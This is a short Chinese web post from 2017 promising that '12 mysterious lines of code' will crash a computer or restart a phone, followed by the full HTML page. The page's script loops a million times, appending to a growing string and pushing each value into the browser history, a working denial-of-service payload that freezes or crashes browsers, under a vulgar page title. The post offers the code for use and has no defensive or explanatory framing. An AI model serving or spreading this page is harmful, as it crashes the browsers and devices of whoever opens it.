剑客网 玩手机 神秘12行代码:让你电脑崩溃手机重启 2017年7月7日 1条评论 神秘12行代码:让你电脑崩溃手机重启 内容 相关 <html> <title>曹尼玛,死机了。</title> <body> <script> var total=""; for (var i=0;i<1000000;i++) { total= total+i.toString(); history.pushState(0,0,total); } </script> </body> </html>